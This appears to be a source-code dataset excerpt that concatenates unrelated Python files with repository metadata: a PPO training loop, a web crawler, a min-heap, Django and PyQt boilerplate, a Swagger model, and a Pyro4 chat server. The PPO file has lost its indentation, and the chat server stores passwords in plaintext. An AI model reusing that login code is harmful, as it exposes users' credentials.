# multi_categoricals = [CategoricalMasked(logits=logits, masks=iam) for (logits, iam) in zip(split_logits, split_invalid_action_masks)]
logprob = torch.stack([categorical.log_prob(a) for a, categorical in zip(action, multi_categoricals)])
entropy = torch.stack([categorical.entropy() for categorical in multi_categoricals])
return action, logprob.sum(0), entropy.sum(0), invalid_action_masks
def get_value(self, x):
return self.critic_head(self.forward(x))
agent = Agent().to(device)
optimizer = optim.Adam(agent.parameters(), lr=args.learning_rate, eps=1e-5)
if args.anneal_lr:
# https://github.com/openai/baselines/blob/ea25b9e8b234e6ee1bca43083f8f3cf974143998/baselines/ppo2/defaults.py#L20
lr = lambda f: f * args.learning_rate
# ALGO Logic: Storage for epoch data
obs = torch.zeros((args.num_steps, args.num_envs) + envs.observation_space.shape).to(device)
actions = torch.zeros((args.num_steps, args.num_envs) + envs.action_space.shape).to(device)
logprobs = torch.zeros((args.num_steps, args.num_envs)).to(device)
rewards = torch.zeros((args.num_steps, args.num_envs)).to(device)
dones = torch.zeros((args.num_steps, args.num_envs)).to(device)
values = torch.zeros((args.num_steps, args.num_envs)).to(device)
invalid_action_masks = torch.zeros((args.num_steps, args.num_envs) + (envs.action_space.nvec.sum(),)).to(device)
# TRY NOT TO MODIFY: start the game
global_step = 0
# Note how `next_obs` and `next_done` are used; their usage is equivalent to
# https://github.com/ikostrikov/pytorch-a2c-ppo-acktr-gail/blob/84a7582477fb0d5c82ad6d850fe476829dddd2e1/a2c_ppo_acktr/storage.py#L60
next_obs = envs.reset()
next_done = torch.zeros(args.num_envs).to(device)
num_updates = args.total_timesteps // args.batch_size
## CRASH AND RESUME LOGIC:
starting_update = 1
if args.prod_mode and wandb.run.resumed:
starting_update = run.summary.get('charts/update') + 1
global_step = starting_update * args.batch_size
api = wandb.Api()
run = api.run(f"{run.entity}/{run.project}/{run.id}")
model = run.file('agent.pt')
model.download(f"models/{experiment_name}/")
agent.load_state_dict(torch.load(f"models/{experiment_name}/agent.pt", map_location=device))
agent.eval()
print(f"resumed at update {starting_update}")
for update in range(starting_update, num_updates+1):
# Annealing the rate if instructed to do so.
if args.anneal_lr:
frac = 1.0 - (update - 1.0) / num_updates
lrnow = lr(frac)
optimizer.param_groups[0]['lr'] = lrnow
# TRY NOT TO MODIFY: prepare the execution of the game.
for step in range(0, args.num_steps):
envs.env_method("render", indices=0)
global_step += 1 * args.num_envs
obs[step] = next_obs
dones[step] = next_done
# ALGO LOGIC: put action logic here
with torch.no_grad():
values[step] = agent.get_value(obs[step]).flatten()
action, logproba, _, invalid_action_masks[step] = agent.get_action(obs[step], envs=envs)
actions[step] = action.T
logprobs[step] = logproba
# TRY NOT TO MODIFY: execute the game and log data.
next_obs, rs, ds, infos = envs.step(action.T)
rewards[step], next_done = rs.view(-1), torch.Tensor(ds).to(device)
for info in infos:
if 'episode' in info.keys():
print(f"global_step={global_step}, episode_reward={info['episode']['r']}")
writer.add_scalar("charts/episode_reward", info['episode']['r'], global_step)
for key in info['microrts_stats']:
writer.add_scalar(f"charts/episode_reward/{key}", info['microrts_stats'][key], global_step)
break
# bootstrap reward if not done. reached the batch limit
with torch.no_grad():
last_value = agent.get_value(next_obs.to(device)).reshape(1, -1)
if args.gae:
advantages = torch.zeros_like(rewards).to(device)
lastgaelam = 0
for t in reversed(range(args.num_steps)):
if t == args.num_steps - 1:
nextnonterminal = 1.0 - next_done
nextvalues = last_value
else:
nextnonterminal = 1.0 - dones[t+1]
nextvalues = values[t+1]
delta = rewards[t] + args.gamma * nextvalues * nextnonterminal - values[t]
advantages[t] = lastgaelam = delta + args.gamma * args.gae_lambda * nextnonterminal * lastgaelam
returns = advantages + values
else:
returns = torch.zeros_like(rewards).to(device)
for t in reversed(range(args.num_steps)):
if t == args.num_steps - 1:
nextnonterminal = 1.0 - next_done
next_return = last_value
else:
nextnonterminal = 1.0 - dones[t+1]
next_return = returns[t+1]
returns[t] = rewards[t] + args.gamma * nextnonterminal * next_return
advantages = returns - values
# flatten the batch
b_obs = obs.reshape((-1,)+envs.observation_space.shape)
b_logprobs = logprobs.reshape(-1)
b_actions = actions.reshape((-1,)+envs.action_space.shape)
b_advantages = advantages.reshape(-1)
b_returns = returns.reshape(-1)
b_values = values.reshape(-1)
b_invalid_action_masks = invalid_action_masks.reshape((-1, invalid_action_masks.shape[-1]))
# Optimizaing the policy and value network
target_agent = Agent().to(device)
inds = np.arange(args.batch_size,)
for i_epoch_pi in range(args.update_epochs):
np.random.shuffle(inds)
target_agent.load_state_dict(agent.state_dict())
for start in range(0, args.batch_size, args.minibatch_size):
end = start + args.minibatch_size
minibatch_ind = inds[start:end]
mb_advantages = b_advantages[minibatch_ind]
if args.norm_adv:
mb_advantages = (mb_advantages - mb_advantages.mean()) / (mb_advantages.std() + 1e-8)
_, newlogproba, entropy, _ = agent.get_action(
b_obs[minibatch_ind],
b_actions.long()[minibatch_ind].T,
b_invalid_action_masks[minibatch_ind],
envs)
ratio = (newlogproba - b_logprobs[minibatch_ind]).exp()
# Stats
approx_kl = (b_logprobs[minibatch_ind] - newlogproba).mean()
# Policy loss
pg_loss1 = -mb_advantages * ratio
pg_loss2 = -mb_advantages * torch.clamp(ratio, 1-args.clip_coef, 1+args.clip_coef)
pg_loss = torch.max(pg_loss1, pg_loss2).mean()
entropy_loss = entropy.mean()
# Value loss
new_values = agent.get_value(b_obs[minibatch_ind]).view(-1)
if args.clip_vloss:
v_loss_unclipped = ((new_values - b_returns[minibatch_ind]) ** 2)
v_clipped = b_values[minibatch_ind] + torch.clamp(new_values - b_values[minibatch_ind], -args.clip_coef, args.clip_coef)
v_loss_clipped = (v_clipped - b_returns[minibatch_ind])**2
v_loss_max = torch.max(v_loss_unclipped, v_loss_clipped)
v_loss = 0.5 * v_loss_max.mean()
else:
                v_loss = 0.5 * ((new_values - b_returns[minibatch_ind]) ** 2).mean()
loss = pg_loss - args.ent_coef * entropy_loss + v_loss * args.vf_coef
optimizer.zero_grad()
loss.backward()
nn.utils.clip_grad_norm_(agent.parameters(), args.max_grad_norm)
optimizer.step()
if args.kle_stop:
if approx_kl > args.target_kl:
break
if args.kle_rollback:
if (b_logprobs[minibatch_ind] - agent.get_action(
b_obs[minibatch_ind],
b_actions.long()[minibatch_ind].T,
b_invalid_action_masks[minibatch_ind],
envs)[1]).mean() > args.target_kl:
agent.load_state_dict(target_agent.state_dict())
break
## CRASH AND RESUME LOGIC:
if args.prod_mode:
if not os.path.exists(f"models/{experiment_name}"):
os.makedirs(f"models/{experiment_name}")
torch.save(agent.state_dict(), f"{wandb.run.dir}/agent.pt")
wandb.save(f"agent.pt")
else:
if update % CHECKPOINT_FREQUENCY == 0:
torch.save(agent.state_dict(), f"{wandb.run.dir}/agent.pt")
# TRY NOT TO MODIFY: record rewards for plotting purposes
writer.add_scalar("charts/learning_rate", optimizer.param_groups[0]['lr'], global_step)
writer.add_scalar("charts/update", update, global_step)
writer.add_scalar("losses/value_loss", v_loss.item(), global_step)
writer.add_scalar("losses/policy_loss", pg_loss.item(), global_step)
writer.add_scalar("losses/entropy", entropy.mean().item(), global_step)
writer.add_scalar("losses/approx_kl", approx_kl.item(), global_step)
if args.kle_stop or args.kle_rollback:
writer.add_scalar("debug/pg_stop_iter", i_epoch_pi, global_step)
envs.close()
writer.close()
|
[
"costa.huang@outlook.com"
] |
costa.huang@outlook.com
|
1af797637785baee1453b708d56a656cf2191fbe
|
49a66a4032a74360b9fc40ea7d86065528ff73f1
|
/crawler.py
|
b08ae3e65a9f3dc3b65a4f19187254d0466f6c41
|
[] |
no_license
|
Jivvon/cnu-computer-noti
|
73713a89026f92c678d85258d77760811ae61c54
|
2918a47d3d3edf900e510526a299dbb9ec510932
|
refs/heads/master
| 2021-03-07T22:58:13.078129
| 2020-11-18T14:31:28
| 2020-11-18T14:31:28
| 246,302,660
| 1
| 1
| null | 2020-07-28T08:02:59
| 2020-03-10T13:03:50
|
Python
|
UTF-8
|
Python
| false
| false
| 1,683
|
py
|
from bs4 import BeautifulSoup
import requests
class Crawler:
def __init__(self, url_data):
self.title, self.url = url_data['title'], url_data['url']
def _prettier_title(self, str):
content = str[:-6].strip()
if content[-1] == '-':
content = content[:-1].strip()
# content += '\n\n'
return content
def crawl_naw_notiwes_new_notices(self):
ret = []
err_msg = ''
try:
res = requests.get(self.url)
soup = BeautifulSoup(res.text, 'html.parser')
            # Only check notices flagged as new (there may be none)
articles = soup.find_all("p", {"class": "b-new"})
for article in articles:
this_article = article.parent.parent
date = this_article.parent.parent.td.find_next("td").find_next("span", {
"class": "b-date"}).text.strip()
title = self._prettier_title(this_article.a['title'])
link = this_article.a['href']
ret.append({"date": date, "title": title, "link": link})
return ret
        except requests.exceptions.HTTPError as errh:
            err_msg = "Http Error: " + str(errh)
            print(err_msg)
        except requests.exceptions.ConnectionError as errc:
            err_msg = "Error Connecting: " + str(errc)
            print(err_msg)
        except requests.exceptions.Timeout as errt:
            err_msg = "Timeout Error: " + str(errt)
            print(err_msg)
        except requests.exceptions.RequestException as err:
            err_msg = "Oops: Something Else: " + str(err)
            print(err_msg)
return err_msg
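# --- Illustrative usage sketch (added; not part of the original module) ---
# The constructor expects a dict with 'title' and 'url' keys; the URL below is
# a placeholder, not an address taken from the original project. On success the
# method returns a list of dicts, on failure it returns an error string.
if __name__ == "__main__":
    crawler = Crawler({"title": "notice board", "url": "https://example.com/board/notice"})
    notices = crawler.crawl_naw_notiwes_new_notices()
    if isinstance(notices, list):
        for notice in notices:
            print(notice["date"], notice["title"], notice["link"])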
|
[
"poiu8944@gmail.com"
] |
poiu8944@gmail.com
|
fd5dc6448f59bcfc54d560de5f9992591b9359e1
|
e43b75b8420aee464960f6ddfb3412abba5b4c43
|
/pkg/heap.py
|
5260130c181e96e9766f3a6848c80b3a5036a84a
|
[] |
no_license
|
omar00070/Search-Algorithm-Vesualiser
|
44dab0985e393d3ba175dc1bcc04b79ed049d528
|
bac365484961a29b810b1f128a91725e7030b435
|
refs/heads/master
| 2021-05-23T10:54:59.154615
| 2020-04-16T12:44:04
| 2020-04-16T12:44:04
| 253,254,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,082
|
py
|
class MinHeap(object):
def __init__(self, items):
self.items = items
def get_left_child_index(self, parent_index):
return 2 * parent_index + 1
def get_right_child_index(self, parent_index):
return 2 * parent_index + 2
def get_parent_index(self, child_index):
return (child_index - 1)//2
def has_left_child(self, index):
return self.get_left_child_index(index) < len(self.items)
def has_right_child(self, index):
return self.get_right_child_index(index) < len(self.items)
def has_parent(self, index):
return self.get_parent_index(index) >= 0
def left_child(self, index):
return self.items[self.get_left_child_index(index)][1]
def right_child(self, index):
return self.items[self.get_right_child_index(index)][1]
def parent(self, index):
return self.items[self.get_parent_index(index)][1]
def peek(self):
if len(self.items) == 0:
print('no items in the list')
return
return self.items[0]
def poll(self):
if len(self.items) == 0:
print('no items in the list')
return
item = self.items[0]
self.items[0] = self.items[len(self.items) - 1]
self.items.pop(len(self.items) - 1)
self.heapify_down()
return item
def add(self, item):
self.items.append(item)
self.heapify_up()
def heapify_up(self):
index = len(self.items) - 1
while self.has_parent(index) and self.items[index][1] < self.parent(index):
self.swap(self.get_parent_index(index), index)
index = self.get_parent_index(index)
def heapify_down(self):
index = 0
while self.has_left_child(index):
min_child_index = self.get_left_child_index(index)
if self.has_right_child(index) and self.right_child(index) < self.left_child(index):
min_child_index = self.get_right_child_index(index)
if self.items[index][1] < self.items[min_child_index][1]:
break
else:
self.swap(index, min_child_index)
index = min_child_index
def swap(self, index, another_index):
swapper = self.items[index]
self.items[index] = self.items[another_index]
self.items[another_index] = swapper
def display(self):
return self.items
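# --- Illustrative usage sketch (added; not part of the original module) ---
# The item[1] comparisons above imply that items are (label, priority) pairs
# ordered by their second element; the values below are made up for the demo.
if __name__ == "__main__":
    heap = MinHeap([])
    for pair in [("c", 3), ("a", 1), ("b", 2)]:
        heap.add(pair)
    print(heap.peek())     # ('a', 1) -- the smallest priority sits at the root
    print(heap.poll())     # removes and returns ('a', 1)
    print(heap.display())  # remaining items, still a valid min-heap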
|
[
"omar_omarsalama@yahoo.com"
] |
omar_omarsalama@yahoo.com
|
7f25f98955abe392b7dda9c8795fbed133a1490e
|
d01af28d2edf3e61dbf24c73d752aebd89d3fa5c
|
/home/management/commands/load_initial_data.py
|
9f2a9023f9c62df73c459d302a05200693568061
|
[] |
no_license
|
crowdbotics-apps/django-new-backend-6-1127
|
9912710446cac1c24053caf9b291d094a438f7a3
|
7b884aa09aa326ebbeb12da20819093f966210d2
|
refs/heads/master
| 2022-03-15T05:32:29.638397
| 2019-11-25T19:34:16
| 2019-11-25T19:34:16
| 224,025,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
from django.core.management import BaseCommand
from home.models import CustomText, HomePage
def load_initial_data():
homepage_body = """
<h1 class="display-4 text-center">DJANGO-NEW-BACKEND-6</h1>
<p class="lead">
This is the sample application created and deployed from the crowdbotics slack app. You can
view list of packages selected for this application below
</p>"""
customtext_title = "DJANGO-NEW-BACKEND-6"
CustomText.objects.create(title=customtext_title)
HomePage.objects.create(body=homepage_body)
class Command(BaseCommand):
can_import_settings = True
help = "Load initial data to db"
def handle(self, *args, **options):
load_initial_data()
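# Usage note (added): as a Django management command living under
# home/management/commands/, this module is invoked from the project root
# with `python manage.py load_initial_data`.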
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
f435292353b2c4e8fbb83a238cc608394eea5ab2
|
4f6b50edc726c3ae8e0fea9bbd2bd960d9b12071
|
/buycoffee.py
|
91b7cfc1cb7287542ff674f7891db9d98fa3a59a
|
[] |
no_license
|
rumeysayilmaz/misc-python
|
1fa51d7b4007ad991cbb820a431b11ca12b4f409
|
47875031b3ebd65072e69622c010c33fa7949c23
|
refs/heads/master
| 2023-08-15T06:21:47.905659
| 2021-10-05T11:06:51
| 2021-10-05T11:06:51
| 225,593,941
| 0
| 0
| null | 2021-04-26T12:47:49
| 2019-12-03T10:35:14
| null |
UTF-8
|
Python
| false
| false
| 4,810
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'buycoffee.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(203, 221)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_3 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_3.setObjectName("gridLayout_3")
self.frame = QtWidgets.QFrame(self.centralwidget)
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.gridLayout_2 = QtWidgets.QGridLayout(self.frame)
self.gridLayout_2.setObjectName("gridLayout_2")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem, 1, 0, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem1, 1, 2, 1, 1)
spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem2, 2, 1, 1, 1)
self.groupBox = QtWidgets.QGroupBox(self.frame)
self.groupBox.setObjectName("groupBox")
self.gridLayout = QtWidgets.QGridLayout(self.groupBox)
self.gridLayout.setObjectName("gridLayout")
self.coffee_pushButton = QtWidgets.QPushButton(self.groupBox)
font = QtGui.QFont()
font.setPointSize(12)
self.coffee_pushButton.setFont(font)
self.coffee_pushButton.setText("")
self.coffee_pushButton.setObjectName("coffee_pushButton")
self.gridLayout.addWidget(self.coffee_pushButton, 0, 0, 1, 1)
self.multiply_label = QtWidgets.QLabel(self.groupBox)
font = QtGui.QFont()
font.setPointSize(12)
self.multiply_label.setFont(font)
self.multiply_label.setObjectName("multiply_label")
self.gridLayout.addWidget(self.multiply_label, 0, 1, 1, 1)
self.cup_lineEdit = QtWidgets.QLineEdit(self.groupBox)
font = QtGui.QFont()
font.setPointSize(12)
self.cup_lineEdit.setFont(font)
self.cup_lineEdit.setText("")
self.cup_lineEdit.setObjectName("cup_lineEdit")
self.gridLayout.addWidget(self.cup_lineEdit, 0, 2, 1, 1)
self.support_pushButton = QtWidgets.QPushButton(self.groupBox)
font = QtGui.QFont()
font.setPointSize(12)
self.support_pushButton.setFont(font)
self.support_pushButton.setText("")
self.support_pushButton.setObjectName("support_pushButton")
self.gridLayout.addWidget(self.support_pushButton, 1, 0, 1, 3)
self.gridLayout_2.addWidget(self.groupBox, 1, 1, 1, 1)
spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem3, 0, 1, 1, 1)
self.gridLayout_3.addWidget(self.frame, 0, 0, 1, 1)
self.bottominfo_label = QtWidgets.QLabel(self.centralwidget)
self.bottominfo_label.setText("")
self.bottominfo_label.setObjectName("bottominfo_label")
self.gridLayout_3.addWidget(self.bottominfo_label, 1, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 203, 22))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.groupBox.setTitle(_translate("MainWindow", "Buy us a Coffee"))
self.multiply_label.setText(_translate("MainWindow", "x"))
self.cup_lineEdit.setPlaceholderText(_translate("MainWindow", "1"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
[
"era.ylmaz@gmail.com"
] |
era.ylmaz@gmail.com
|
6caf293016e15a9355c2daf611612291c1fe1e16
|
e519a3134e5242eff29a95a05b02f8ae0bfde232
|
/services/control-tower/vendor/riffyn-sdk/swagger_client/models/update_activity_body.py
|
6c2506664c5cc08aa10e67f70e81da898030ac23
|
[] |
no_license
|
zoltuz/lab-automation-playground
|
ba7bc08f5d4687a6daa64de04c6d9b36ee71bd3e
|
7a21f59b30af6922470ee2b20651918605914cfe
|
refs/heads/master
| 2023-01-28T10:21:51.427650
| 2020-12-04T14:13:13
| 2020-12-05T03:27:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,857
|
py
|
# coding: utf-8
"""
Riffyn REST API
### Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ### Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ### Authentication Begin with a call the [authenticate](/#api-Authentication-authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your prefered token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](/#api-Authentication-verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn App UI. ### Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ### Postman endpoint examples There is a YAML file with the examples of the request on Riffyn API [Click here](/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. 
### Client SDKs You may write your own API client, or you may use one of ours. [Click here](/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: support@riffyn.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class UpdateActivityBody(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'description': 'str',
'db_query': 'bool',
'file_upload': 'bool'
}
attribute_map = {
'name': 'name',
'description': 'description',
'db_query': 'dbQuery',
'file_upload': 'fileUpload'
}
def __init__(self, name=None, description=None, db_query=None, file_upload=None): # noqa: E501
"""UpdateActivityBody - a model defined in Swagger""" # noqa: E501
self._name = None
self._description = None
self._db_query = None
self._file_upload = None
self.discriminator = None
if name is not None:
self.name = name
if description is not None:
self.description = description
if db_query is not None:
self.db_query = db_query
if file_upload is not None:
self.file_upload = file_upload
@property
def name(self):
"""Gets the name of this UpdateActivityBody. # noqa: E501
The new name for the activity being updated. If no name is provided, it will default to 'unnamed'. # noqa: E501
:return: The name of this UpdateActivityBody. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this UpdateActivityBody.
The new name for the activity being updated. If no name is provided, it will default to 'unnamed'. # noqa: E501
:param name: The name of this UpdateActivityBody. # noqa: E501
:type: str
"""
self._name = name
@property
def description(self):
"""Gets the description of this UpdateActivityBody. # noqa: E501
A description of the step that will appear in the side panel of the application. # noqa: E501
:return: The description of this UpdateActivityBody. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this UpdateActivityBody.
A description of the step that will appear in the side panel of the application. # noqa: E501
:param description: The description of this UpdateActivityBody. # noqa: E501
:type: str
"""
self._description = description
@property
def db_query(self):
"""Gets the db_query of this UpdateActivityBody. # noqa: E501
Defines whether pulling data from a database query will be required on the experiments made from this process. # noqa: E501
:return: The db_query of this UpdateActivityBody. # noqa: E501
:rtype: bool
"""
return self._db_query
@db_query.setter
def db_query(self, db_query):
"""Sets the db_query of this UpdateActivityBody.
Defines whether pulling data from a database query will be required on the experiments made from this process. # noqa: E501
:param db_query: The db_query of this UpdateActivityBody. # noqa: E501
:type: bool
"""
self._db_query = db_query
@property
def file_upload(self):
"""Gets the file_upload of this UpdateActivityBody. # noqa: E501
Defines whether pulling data via a file upload will be required on the experiments made from this process. # noqa: E501
:return: The file_upload of this UpdateActivityBody. # noqa: E501
:rtype: bool
"""
return self._file_upload
@file_upload.setter
def file_upload(self, file_upload):
"""Sets the file_upload of this UpdateActivityBody.
Defines whether pulling data via a file upload will be required on the experiments made from this process. # noqa: E501
:param file_upload: The file_upload of this UpdateActivityBody. # noqa: E501
:type: bool
"""
self._file_upload = file_upload
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(UpdateActivityBody, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateActivityBody):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"jaceys.tan@gmail.com"
] |
jaceys.tan@gmail.com
|
c2725c51490a01461ad12e6f63e3cd859f2a3494
|
bb085bb384e847329d6816027aca703ce2a08c11
|
/PythonExercicio/ex097.py
|
8cce5b2cfb554a76997fe86ef3e8c7e38b23d3f9
|
[
"MIT"
] |
permissive
|
VazMF/cev-python
|
cd3174e5ea1b3574d0dff4f5ca367d2f695af789
|
9b33f0bc3de5dd9380fdd4eb3d901b04e536d45a
|
refs/heads/master
| 2023-02-27T23:25:15.049300
| 2021-02-02T11:47:33
| 2021-02-02T11:47:33
| 262,906,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 691
|
py
|
#Write a program that has a function called escreva(), which receives any text as a parameter and shows a message with an adaptable size
#DEFINING THE FUNCTION
def escreva(txt): #function with a text parameter
    tam = len(txt) + 4 #the tam variable receives the length of txt + 4
    print('~' * tam) #print one ~ for each character of the text
    print(f' {txt}') #formatted print of the text with spaces to center it
    print('~' * tam) #print one ~ for each character of the text
#main program
escreva('Fuck this love calling my name, get out of my veins') #using the escreva function
escreva('No reasons to stay, is a good reason to go')
escreva('No crying in the club')
|
[
"vazfernandam@gmail.com"
] |
vazfernandam@gmail.com
|
3974e7f5c8ad03000cf7d466e97d7638c8111a37
|
5063faf298a36466cdb90f1cbd0a4f4e855b5d3b
|
/test/test_task_path_reference.py
|
e8b6750bf47e6f452dd8b246ef0d5f54043ce65d
|
[] |
no_license
|
pollination/python-sdk
|
d4eb4efbcbe3a76cc170cf8e71ad5bc6ca6c3011
|
e4a94b236534658b150961795256224fe8dd93c2
|
refs/heads/master
| 2023-08-04T15:19:29.126613
| 2022-03-06T10:43:21
| 2022-03-06T10:51:08
| 224,588,062
| 3
| 1
| null | 2023-09-05T20:52:35
| 2019-11-28T06:48:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,648
|
py
|
# coding: utf-8
"""
pollination-server
Pollination Server OpenAPI Definition # noqa: E501
The version of the OpenAPI document: 0.27.0
Contact: info@pollination.cloud
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import pollination_sdk
from pollination_sdk.models.task_path_reference import TaskPathReference # noqa: E501
from pollination_sdk.rest import ApiException
class TestTaskPathReference(unittest.TestCase):
"""TaskPathReference unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test TaskPathReference
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = pollination_sdk.models.task_path_reference.TaskPathReference() # noqa: E501
if include_optional :
return TaskPathReference(
annotations = {
'key' : '0'
},
name = '0',
type = 'TaskPathReference',
variable = '0'
)
else :
return TaskPathReference(
name = '0',
variable = '0',
)
def testTaskPathReference(self):
"""Test TaskPathReference"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"antoinedao1@gmail.com"
] |
antoinedao1@gmail.com
|
46ec4a8216c97b11238b5fbe9a213803b9958c31
|
9997b17e63f7f41dd9c71122c5dcc39a25d1634b
|
/server/server.py
|
2064999b8475e6707ed1475ff052015e49e49552
|
[] |
no_license
|
Darge/Messenger
|
0cc4fdb753d1e3780418326d043b45e858ba635b
|
84915eda13c245bb73b4c180aff62022d9f1d18a
|
refs/heads/master
| 2021-01-25T12:01:53.559902
| 2015-09-04T05:37:29
| 2015-09-04T05:37:29
| 32,997,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,724
|
py
|
'''
Tomasz Flendrich
student ID number 264596
'''
import sqlite3
import thread
from datetime import datetime
import Pyro4
import sys
import os
'''
This module is the server of the Messenger. It handles communication with the clients.
'''
class Server(object):
def log_in(self, nick, password):
'''When a client sends us a log in request'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db") # thread-safe as long as every thread has a different cursor (and they do)
cursor=database.cursor()
cursor.execute("SELECT Rowid, Nick, Password FROM Users WHERE Nick LIKE ?", (nick,))
existing=cursor.fetchone()
if existing==None:
cursor.execute("INSERT INTO Users VALUES (?, ?)", (nick, password))
database.commit()
cursor.close()
return "account created"
else:
if existing[1]==nick and existing[2]==password:
cursor.close()
return "correct password"
else:
cursor.close()
return "wrong password"
def new_messages_info_request(self, nick):
